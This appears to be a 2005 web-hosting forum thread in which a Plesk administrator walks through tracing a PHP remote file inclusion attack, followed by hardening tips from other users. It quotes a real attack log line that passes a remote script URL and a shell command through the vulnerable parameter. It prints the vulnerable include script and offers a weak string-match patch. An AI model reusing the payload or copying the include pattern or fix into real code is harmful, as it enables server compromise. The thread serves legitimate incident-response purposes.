1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice

Catching a Hacker

Discussion in 'Plesk for Linux - 8.x and Older' started by gromett, Jun 26, 2005.

  1. gromett

    gromett Guest

    0
     
    I am happy to say that since moving on to Plesk attacks and attempts on my servers have been greatly reduced. The only ones I get now are the cross server scripting ones. Currently I just monitor the /tmp and /var/tmp directory for suspicious files every minute which lets me know when one is in progress. What follows is how I managed to track down how it happened so I could fix the clients dodgy script. I am posting this to help others who may not have time or knowledge to do so.

    1) I went to /var/tmp and moved all files to /root/hack for later perusal
    2) Did a ps aux to get the process id's and file names of the scripts being run.
    apache 29836 0.0 0.0 864 184 ttyp0 S 19:32 0:00 ./ssh-scan 100
    These had been created by a shell called /.x
    3) Did a netstat -lvanp to find out the remote IP of the attacker.
    tcp 0 0 213.232.100.82:5500 222.124.31.12:4352 ESTABLISHED 7862/x
    4) Hackers IP is 222.124.31.12 now to find out which script was responsible for the breach
    5) used this find command to check all log files
    find /home/httpd/vhosts/ -name access_log -print -exec grep "195.93.21.100" {} \;
    6) From this I could see the site name (modified)
    cat /home/httpd/vhosts/thedomain.com/statistics/logs/access_log | grep "222.124.31.12" >/root/hack/access_log

    Here is a sample log entry
    /eolaud.php?SiteRef=http://www.virama.com/net.txt?&cmd=cd%20/var/spool/samba;mkdir%20.ro HTTP/1.0" 200 9623 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"

    The script was is called eolaud.php
    I had a look at this script and it had 1 line of php code in it.
    <?
    include $SiteRef;
    ?>

    You can see that by passing ?SiteRef=......
    You could include a file or script from another site.

    I changed this script to the following and notified the client
    <?
    if (eregi("http",$SiteRef)) {
    $SiteRef="";
    }
    include $SiteRef;
    ?>

    If a remote address is now entered it blanks the variable.

    In addition to this I have contacted the 4 hosts that were used by the hacker including the
    http://geocities.com/evikhobare/dodol.txt
    www.virama.com
    the IP owner for the hacker and the site were he had his hacking tools hosted.
    Hopefully he will be shut down. I have offered all the forensic evidence to the providers if they want to bring the authorities in.

    I am updating my checking scripts to include an hourly scan of all access_logs looking for /var/tmp and /tmp

    I hope this info helps.


    Regards Karl
     
  2. imiles

    imiles Guest

    0
     
    Karl,

    Congratulations with your "catch" and thanks for sharing this with us.

    Just one extra question: when you say that you monitor /tmp and /var/tmp every minute, what are you actually doing and looking for?

    Ingrid.
     
  3. Luckiestlee

    Luckiestlee Guest

    0
     
    thx for sharing the info Karl.

    i have quite a similiar attach and it's full my bandwitdh.

    but now instead monitoring my /var/tmp and /tmp , i made a personal partion to /tmp and i loaded it with noexec, and nosuid .
    i also change mode to wget, c**, gcc** to 600 (root only access) and scan through my home/httpd/vhost for unusual file and expesially file that own by apache and world writeable when it's all gone, my server is normal again.

    Regards
    Lucky
     
Loading...